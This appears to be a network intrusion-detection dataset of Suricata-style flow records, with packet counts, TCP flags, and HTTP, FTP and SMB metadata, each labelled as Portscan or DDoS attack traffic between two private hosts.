172.16.0.1-35592-192.168.10.50-80-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 9, flow_pkts_toclient: 6, flow_bytes_toserver: 620, flow_bytes_toclient: 11999, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1f, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 13, tcp_syn: True, tcp_fin: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_method: GET, http_protocol: HTTP/1.0, http_length: 0 | false | Portscan | true | 17:14:57 | 4,509 | Friday | [] | 197 | attack | 1,335,799 |
172.16.0.1-60794-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6571014, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:15:03 | 5,253 | Friday | [] | 221 | attack | 1,335,870 |
172.16.0.1-60804-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6571887, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:15:14 | 88,467 | Friday | [] | 221 | attack | 1,335,885 |
172.16.0.1-35612-192.168.10.50-80-6 | ['flow', 'http', 'fileinfo'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 9, flow_pkts_toclient: 6, flow_bytes_toserver: 620, flow_bytes_toclient: 11999, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1f, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 13, tcp_syn: True, tcp_fin: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.0, http_status: 200, http_length: 1174 ; event_type: fileinfo, proto: TCP, http_url: /, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.0, http_status: 200, http_length: 1174, app_proto: http, fileinfo_filename: /, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 1174, fileinfo_tx_id: 0 | false | Portscan | true | 17:15:21 | 5,535 | Friday | [] | 332 | attack | 1,335,897 |
172.16.0.1-60814-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6572819, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:15:26 | 11,371 | Friday | [] | 221 | attack | 1,335,907 |
172.16.0.1-35622-192.168.10.50-80-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 8, flow_pkts_toclient: 6, flow_bytes_toserver: 554, flow_bytes_toclient: 11999, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_method: GET, http_protocol: HTTP/1.0, http_length: 2896 | false | Portscan | true | 17:15:32 | 230,924 | Friday | [] | 193 | attack | 1,335,913 |
172.16.0.1-60824-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6573557, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:15:37 | 23,436 | Friday | [] | 221 | attack | 1,335,927 |
172.16.0.1-35634-192.168.10.50-80-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 466, flow_bytes_toclient: 11914, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_hostname: ip-68-165-174-205.ironcladservers.ca, http_url: /, http_http_method: GET, http_protocol: HTTP/1.1, http_length: 0 | false | Portscan | true | 17:15:43 | 2,193 | Friday | [] | 214 | attack | 1,335,936 |
172.16.0.1-35632-192.168.10.50-80-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 8, flow_pkts_toclient: 6, flow_bytes_toserver: 554, flow_bytes_toclient: 11999, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_method: GET, http_protocol: HTTP/1.0, http_length: 21420 | false | Portscan | true | 17:15:43 | 356,109 | Friday | [] | 193 | attack | 1,335,935 |
172.16.0.1-60834-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6574640, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:15:49 | 5,014 | Friday | [] | 221 | attack | 1,335,957 |
172.16.0.1-35652-192.168.10.50-80-6 | ['flow'] | event_type: flow, proto: TCP, flow_pkts_toserver: 4, flow_pkts_toclient: 2, flow_bytes_toserver: 272, flow_bytes_toclient: 140, flow_age: 4, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 13, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 13, tcp_syn: True, tcp_fin: True, tcp_ack: True, tcp_state: closed | false | Portscan | true | 17:16:00 | 297,578 | Friday | [] | 126 | attack | 1,336,250 |
172.16.0.1-60846-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 6578847, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 17:16:00 | 5,033 | Friday | [] | 221 | attack | 1,336,248 |
172.16.0.1-33562-192.168.10.50-49152-6 | ['flow'] | event_type: flow, proto: TCP, flow_pkts_toserver: 1, flow_pkts_toclient: 1, flow_bytes_toserver: 60, flow_bytes_toclient: 60, flow_age: 1, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 16, tcp_tcp_flags_ts: 02, tcp_tcp_flags_tc: 14, tcp_syn: True, tcp_rst: True, tcp_ack: True, tcp_state: closed | false | Portscan | true | 17:52:38 | 87 | Friday | [] | 127 | attack | 1,392,671 |
172.16.0.1-49656-192.168.10.50-199-6 | ['flow'] | event_type: flow, proto: TCP, flow_pkts_toserver: 1, flow_pkts_toclient: 0, flow_bytes_toserver: 74, flow_bytes_toclient: 0, flow_age: 0, flow_state: new, flow_reason: timeout, tcp_tcp_flags: 02, tcp_tcp_flags_ts: 02, tcp_tcp_flags_tc: 00, tcp_syn: True, tcp_state: syn_sent | false | Portscan | true | 17:54:15 | 0 | Friday | [] | 116 | attack | 1,412,703 |
172.16.0.1-52908-192.168.10.50-30718-6 | ['flow'] | event_type: flow, proto: TCP, flow_pkts_toserver: 1, flow_pkts_toclient: 1, flow_bytes_toserver: 74, flow_bytes_toclient: 60, flow_age: 1, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 16, tcp_tcp_flags_ts: 02, tcp_tcp_flags_tc: 14, tcp_syn: True, tcp_rst: True, tcp_ack: True, tcp_state: closed | false | Portscan | true | 17:54:51 | 43 | Friday | [] | 127 | attack | 1,442,013 |
172.16.0.1-57038-192.168.10.50-80-6 | ['flow'] | event_type: flow, proto: TCP, flow_pkts_toserver: 4, flow_pkts_toclient: 2, flow_bytes_toserver: 272, flow_bytes_toclient: 140, flow_age: 5, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 13, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 13, tcp_syn: True, tcp_fin: True, tcp_ack: True, tcp_state: closed | false | Portscan | true | 18:03:13 | 2,811 | Friday | [] | 126 | attack | 1,497,957 |
172.16.0.1-54028-192.168.10.50-21-6 | ['flow', 'ftp'] | event_type: flow, proto: TCP, app_proto: ftp, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 338, flow_bytes_toclient: 226, flow_age: 0, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 13, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 7455987, event_type: ftp, proto: TCP, tx_id: 0, ftp_completion_code_0: 220, ftp_reply_0: (vsFTPd 3.0.3), ftp_reply_received: yes, ftp_reply_truncated: False | false | Portscan | true | 18:08:04 | 10,588 | Friday | [] | 221 | attack | 1,501,176 |
172.16.0.1-41526-192.168.10.50-445-6 | ['flow', 'smb'] | event_type: flow, proto: TCP, app_proto: smb, flow_pkts_toserver: 6, flow_pkts_toclient: 4, flow_bytes_toserver: 572, flow_bytes_toclient: 399, flow_age: 6, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 7456464, event_type: smb, proto: TCP, smb_id: 1, smb_dialect: NT LANMAN 1.0, smb_command: SMB1_COMMAND_NEGOTIATE_PROTOCOL, smb_status: STATUS_SUCCESS, smb_status_code: 0x0, smb_session_id: 0, smb_tree_id: 0, smb_client_dialects_0: PC NETWORK PROGRAM 1.0, smb_client_dialects_1: MICROSOFT NETWORKS 1.03, smb_client_dialects_2: MICROSOFT NETWORKS 3.0, smb_client_dialects_3: LANMAN1.0, smb_client_dialects_4: LM1.2X002, smb_client_dialects_5: Samba, smb_client_dialects_6: NT LANMAN 1.0, smb_client_dialects_7: NT LM 0.12, smb_server_guid: 1a3d58f7-9433-0e15-0054-004500540053 | false | Portscan | true | 18:08:04 | 29,287 | Friday | [] | 431 | attack | 1,501,180 |
172.16.0.1-49288-192.168.10.50-139-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 3, flow_bytes_toserver: 356, flow_bytes_toclient: 206, flow_age: 11, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 13, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_method: GET, http_protocol: HTTP/1.0, http_length: 0 | false | Portscan | true | 18:08:04 | 37,921 | Friday | [] | 189 | attack | 1,501,179 |
172.16.0.1-49533-192.168.10.50-80-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 7, flow_pkts_toclient: 6, flow_bytes_toserver: 440, flow_bytes_toclient: 11937, flow_age: 11, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1e, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 12, tcp_syn: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_method: GET, http_protocol: HTTP/1.0, http_length: 1534 | false | DDoS | true | 18:56:31 | 467,418 | Friday | [] | 192 | attack | 1,545,023 |
172.16.0.1-49534-192.168.10.50-80-6 | ['flow', 'http'] | event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 8, flow_pkts_toclient: 6, flow_bytes_toserver: 500, flow_bytes_toclient: 11943, flow_age: 11, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1f, tcp_tcp_flags_ts: 1e, tcp_tcp_flags_tc: 13, tcp_syn: True, tcp_fin: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; event_type: http, proto: TCP, tx_id: 0, http_url: /, http_http_method: GET, http_protocol: HTTP/1.0, http_length: 0 | false | DDoS | true | 18:56:31 | 442,457 | Friday | [] | 197 | attack | 1,545,024 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.